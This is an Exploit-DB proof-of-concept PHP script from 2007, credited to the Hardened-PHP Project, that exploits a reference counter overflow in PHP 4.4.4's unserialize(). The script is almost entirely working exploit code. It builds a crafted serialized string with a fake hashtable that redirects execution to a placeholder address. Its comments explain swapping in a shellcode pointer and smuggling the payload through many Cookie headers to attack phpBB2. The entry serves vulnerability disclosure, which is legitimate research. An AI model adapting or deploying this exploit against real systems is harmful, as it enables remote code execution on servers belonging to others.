PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC)

EDB-ID:

3396

Type:

dos

Platform:

Linux

Published:

2007-03-02

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //           PHP 4 - unserialize() Reference Counter Overflow         //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");
  
  // This exploit is only designed for linux x86 systems
  // where 0x08064058 is a readable address in the PHP process 
  // (should be unless binary images are relocated default systems)
  // 
  // The exploit does nothing useful. It just proves that the CPU
  // will try to execute the instruction at 0x99887766 which results
  // in a crash. Just replace it with a pointer to your shellcode and
  // it will work.
  //
  // To exploit phpBB2 with this you need to put a similar string
  // into the cookie. You must work around the size limit of HTTP
  // headers by using MANY Cookie: headers (not folded lines, real
  // headers). Additionally you must put at the end of ever line
  // a line terminator s:2:" and start every following line with
  // ";N; of course with URL encoded ';'

  $hashtable = str_repeat("A", 39);
  
  $hashtable[5*4+0]=chr(0x58);
  $hashtable[5*4+1]=chr(0x40);
  $hashtable[5*4+2]=chr(0x06);
  $hashtable[5*4+3]=chr(0x08);
  
  $hashtable[8*4+0]=chr(0x66);
  $hashtable[8*4+1]=chr(0x77);
  $hashtable[8*4+2]=chr(0x88);
  $hashtable[8*4+3]=chr(0x99);

  $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
  for ($i=0; $i<65535; $i++) {
    $str .= 'i:0;R:2;';
  }
  $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';

  unserialize($str);

?>

# milw0rm.com [2007-03-02]